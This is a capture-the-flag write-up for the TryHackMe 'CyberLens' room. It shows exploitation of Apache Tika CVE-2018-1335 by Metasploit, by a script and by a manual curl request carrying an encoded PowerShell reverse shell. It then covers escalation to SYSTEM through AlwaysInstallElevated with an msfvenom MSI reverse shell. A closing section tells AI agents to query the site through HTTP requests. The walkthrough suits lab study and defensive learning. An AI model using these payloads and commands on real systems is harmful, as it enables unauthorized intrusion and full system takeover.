# CyberLens

{% embed url="<https://tryhackme.com/r/room/cyberlensp6>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with a Nmap scan and find several open ports on the system, including common services such as Microsoft RPC (135/tcp), NetBIOS (139/tcp), Microsoft-DS (445/tcp), Remote Desktop Protocol (3389/tcp) and Windows Remote Management (5985/tcp and 47001/tcp). Additionally, several ports (49664/tcp to 49670/tcp and 49677/tcp) are open but have unknown services running on them, mostly associated with RPC. Furthermore, there is a web server running on port 80.

<figure><img src="/files/dEiNUNrLeUAb7krdCqF0" alt=""><figcaption></figcaption></figure>

A subsequent default script and version scan gives us more details; not only do we have a web server running on port 80, but also on port 61777.

<figure><img src="/files/q5kKBzKJxJYArkCpTKtr" alt=""><figcaption></figcaption></figure>

Let's take a look at the page on port 80 first. A one-pager page.

<figure><img src="/files/MCqAlFRSMCIKFQNqH5oc" alt=""><figcaption></figcaption></figure>

We have a contact form, but it was not vulnerable to XSS, tested by some payloads.

<figure><img src="/files/eUUBooALRcJERfHx4t8D" alt=""><figcaption></figcaption></figure>

If we scroll further, we have a form for entering images in order to extract metadata about the image. The first thoughts here were a simple reverse shell upload, an exploit via ImageMagick, and a reverse shell via the metadata, created using exiftool. But none of this was successful.

<figure><img src="/files/MO8xAcbw31QGWwkD8KIg" alt=""><figcaption></figcaption></figure>

Looking at the source, we find the end point at `61777`. We may be able to make progress here. But let's take another look via Burp.

<figure><img src="/files/rwrUO3l4c6SU9mMT0Hrk" alt=""><figcaption></figcaption></figure>

The `61777` endpoint is responsible for metadata extraction.

<figure><img src="/files/Hr1D0AQ7PBecIWJlnTKM" alt=""><figcaption></figcaption></figure>

When visiting the index page of the endpoint, we have a direct hit that we can check for possible vulnerabilities. We are dealing with `Apache Tika 1.17`.

<figure><img src="/files/9nocHuoR4WVcHEuebosN" alt=""><figcaption></figcaption></figure>

This machine is vulnerable to `CVE-2018-1335`.

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2018-1335>" %}

## Shell as cyberlens

After a short search using Searchsploit, we find two POCs that implement a command injection and match our version. We look at the first hit and see that it is a metasploit module. Let's continue with this for now.

<figure><img src="/files/jRRbztwKhYguscMiBoMp" alt=""><figcaption></figcaption></figure>

### Metasploit

We are looking for Tika and the module we found earlier is available in our installation. We use it and look at which options we have to set.

<figure><img src="/files/HkLk95xjvEgYIUo8WCkU" alt=""><figcaption></figcaption></figure>

We set the options `LHOST`, `RHOST` and `RPORT`.

```
set LHOST 10.8.211.1
set RPORT 61777
set RHOSTS cyberlens.thm
```

<figure><img src="/files/2oUVt0j23nw225XbymrR" alt=""><figcaption></figcaption></figure>

Next, we run the exploit and get a reverse shell as `cyberlens`.

<figure><img src="/files/2v1ifqxsDCKhcLu2up50" alt=""><figcaption></figcaption></figure>

On the user's desktop, we find user flag.

<figure><img src="/files/2iGFWkX1k9ewPSYXzcpP" alt=""><figcaption></figcaption></figure>

Using `tree /f`, we enumerate the user's file system and find their credentials under `C:\Users\CyblerLens`.

<figure><img src="/files/dtGpm02tDZRwRhdHhej7" alt=""><figcaption></figcaption></figure>

### Script

CVE-2018-1335 is a remote code execution vulnerability in Apache Tika. It allows an attacker to execute arbitrary code on the server by sending a specially crafted HTTP request. This exploit leverages the way Tika handles OCR (Optical Character Recognition) processing, where it can be tricked into executing malicious scripts.

A detailed explaination of this vulnerabilty can be found at the following resource (do not miss out on that):

{% embed url="<https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/>" %}

Like the blog entry, the script comes from `Rhino Security Labs` and allows us to execute commands on the system.

<figure><img src="/files/0gyA4LXsOSEb6UJobDsc" alt=""><figcaption></figcaption></figure>

We use revshells.com to create a PowerShelle reverse shell.

<figure><img src="/files/QOX4D7Rdcg1XcTlB0pXR" alt=""><figcaption></figcaption></figure>

And set up a listener on `445`. Execute it using the script...

<figure><img src="/files/IOggSF2kUpSwkzSk4Rw6" alt=""><figcaption></figcaption></figure>

... we get a connection back as `cyberlens`.

<figure><img src="/files/ARYlNYEt639mzY1VG0JT" alt=""><figcaption></figcaption></figure>

### Manually

We can also do it manually...&#x20;

The exploit can be triggered by the request below. With that, we can pop a `calc.exe`. But that's all we can do here, since we cannot pass multiple commands or arguments with this. The command is being passed to Java ProcessBuilder as an array and all we can do is to pass the command as a single string.

```


curl -T lens.pong http://cyberlens.thm:61777/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\""


```

Since we want to spawn a reverse shell, which requires more than one parameter, we need a workaround discussed in the blog and used in the script.

{% embed url="<https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/>" %}

To pass multiple arguments in the command line exploited by Tika-server, the `X-Tika-OCRTesseractPath` header is set to `"cscript.exe"` and `X-Tika-OCRLanguage` is set to `//E:Jscript`, allowing the first argument (a temp file containing the script) to be executed by `cscript.exe` with the specified script engine. The "image" file uploaded contains Jscript or VBS code, which is then processed by Tika-server, enabling full script execution.

With the following cURL request we are able to pop a reverse shell.

```
curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIAMQAxAC4AMQAiACwANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA');"

```

<figure><img src="/files/Bgjj1EXhg3OFi6ATl3ef" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AKrdKwRaOTXT4qUXG9iq" alt=""><figcaption></figcaption></figure>

## Shell as NT AUTHORITY\SYSTEM

To enumerate windows host scripts like winpeas, powerup or privesccheck can be used.

{% embed url="<https://github.com/itm4n/PrivescCheck>" %}

Furthermore, we can check if any protection, like antivirus or Windows Defender, is up and running. Using `Get-MpComputerStatus`, we can see neither of the protection mechanisms is enabled or running. So we are free to use any scripts and malicious payloads, like msfvenom. There is no hustle to bypass anything.

```powershell
PS C:\Users\Cyberlens> Get-MpComputerStatus
```

<figure><img src="/files/Pm2BSz181kLQA6mu1tcf" alt=""><figcaption></figcaption></figure>

With a quick run of `PrivescCheck.ps1` ...

```
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended
```

<figure><img src="/files/gmSlB2rp90RM4sNXilS5" alt=""><figcaption></figcaption></figure>

... we see that `AlwaysInstallElevated` might be enabled. If `AlwaysInstallElevated` is enabled on a target, it allows us to exploit it by crafting our own malicious MSI file that gets executed in the context of the local SYSTEM account.

Once created, we can download and execute the malicious file on the victim as ANY user, and it will run under the context of the local SYSTEM account. This means that by placing malicious shell code in an MSI file, we are able to obtain a reverse shell as SYSTEM.

<figure><img src="/files/YbusQmnfYQWJtICL7VqD" alt=""><figcaption></figcaption></figure>

A detailed walkthrough on how to detect and exploit this misconfiguration can be looked up here:

{% embed url="<https://juggernaut-sec.com/alwaysinstallelevated/>" %}

We can check the registry entries regarding `AlwaysInstallElevated` and see that this is indeed allowed.

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

<figure><img src="/files/PvCmpt2AxwC1SkqN1oYX" alt=""><figcaption></figcaption></figure>

We craft a simple Windows reverse shell via msfvenom in the file format of an MSI.

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.211.1 LPORT=443 -a x64 --platform Windows -f msi -o rev.msi
```

<figure><img src="/files/lkrItKFVcqCWvKYCSprd" alt=""><figcaption></figcaption></figure>

Next, we set up a listener, and after executing the MSI...

<figure><img src="/files/Hvxa1BdSB25qxd1avZYn" alt=""><figcaption></figcaption></figure>

... we receive a connection as `nt authority\system` and find the root flag at\
&#x20;`C:\Users\Administrator\Desktop\admin.txt`.

<figure><img src="/files/M4nGV4X8f9RzBiASh4lB" alt=""><figcaption></figcaption></figure>

## Recommendation

Don't miss out on gravereaper2038s writeup, where he makes use of `CVE-2021-40449` to gain elevated privileges in the last section of his writeup:

{% embed url="<https://manav-g-krishna.gitbook.io/tryhackme-writeups/cyberlens>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/cyberlens.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.